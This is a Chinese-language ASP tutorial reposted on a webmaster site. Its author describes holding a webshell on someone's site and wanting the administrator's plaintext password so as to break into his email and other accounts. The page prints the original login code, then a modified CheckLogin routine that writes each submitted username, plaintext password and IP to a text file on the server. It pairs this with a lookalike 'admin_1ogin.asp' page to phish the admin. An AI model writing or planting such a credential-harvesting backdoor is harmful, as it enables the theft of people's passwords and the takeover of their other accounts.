加入收藏 | 设为首页 | 会员中心 | 我要投稿 银川站长网 (https://www.0951zz.com/)- 云通信、基础存储、云上网络、机器学习、视觉智能!
当前位置: 首页 > 站长学院 > Asp教程 > 正文

如何获取ASP后端登录密码示例

发布时间:2023-10-27 13:08:12 所属栏目:Asp教程 来源:
导读:在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!因为很多人喜欢使用

在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。

下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!

因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。

首先看看他的后台登陆代码

<%

Dim Login

Set Login=new AdLogin

Login.Execute

Class AdLogin

Private ExCommCls

Private Sub class_initialize

Set CommCls=new CommonCls

ExCommCls.IsIpAllow

ExCommCls.CheckInstall

ExCommCls.GetConfigCache("*")

End Sub

Private Sub class_terminate

Set ExCommCls=nothing

End Sub

public Sub Execute

Dim Action

Action=Request("action")

Select Case Action

Case "CheckLogin"

CheckLogin

Case "LoginOut"

LoginOut

Case Else

LoginF

End Select

End Sub

Private Sub CheckLogin

Dim Adname,AdPwd,CheckCode

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=md5(Trim(request("AdPwd")))

CheckCode=ExCommCls.G(request("checkCode"))

If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then

ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"admin_login.asp"

Exit Sub

End If

If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then

Response.Cookies(Md5(SN))("AdName")=AdName

Response.Cookies(Md5(SN))("AdPwd")=AdPwd

session("AdLogin")=Md5(SN)

ExCommCls.GetConfigCache("*")

ExCommCls.GetClassCache()

Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")

Else

ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"

End if

End Sub

Private Sub LoginOut

Response.Cookies(Md5(SN))("AdName")=""

Response.Cookies(Md5(SN))("AdPwd")=""

session.Abandon()

ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"

End Sub

Private Sub LoginF

%>

看下列代码

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=md5(Trim(request("AdPwd")))

---意思很简单,这里就不明说了, 主要看md5 ,密码使用md5加密 这样的话,我们记录的密码也就没用了,还是md5。所以

所以想到了,一个钓鱼手法。 它本来的登录界面是

Private Sub CheckLogin

Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=(Trim(request("AdPwd")))

CheckCode=ExCommCls.G(request("checkCode"))

strLogFile="test.txt"

IP=request("IP")

StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")

set f=Server.CreateObject("scripting.filesystemobject")

set ff=f.opentextfile(server.mappath(".")&"/"&strLogFile,8,true,0)

ff.writeline(chr(13)+chr(10)&StrLogText)

ff.close

set ff=nothing

set f=nothing

If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then

ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"

Exit Sub

End If

If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then

Response.Cookies(Md5(SN))("AdName")=AdName

Response.Cookies((SN))("AdPwd")=AdPwd

session("AdLogin")=Md5(SN)

ExCommCls.GetConfigCache("*")

ExCommCls.GetClassCache()

Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")

Else

ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"Admin_1ogin.asp"

End if

End Sub

a=本来的登录页面 现在换成了钓鱼页面

b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp

为什么呢。

本来的: AdPwd=md5(Trim(request("AdPwd")))

Response.Cookies(Md5(SN))("AdPwd")=AdPwd

修改

AdPwd=(Trim(request("AdPwd")))

Response.Cookies((SN))("AdPwd")=AdPwd

(编辑:银川站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
    相关内容
      推荐文章
        站长推荐
        热点阅读

        【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

        建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的优质浏览效果

        Copygight © 2017-2023 https://www.0951zz.com/ All Rights Reserved. 银川站长网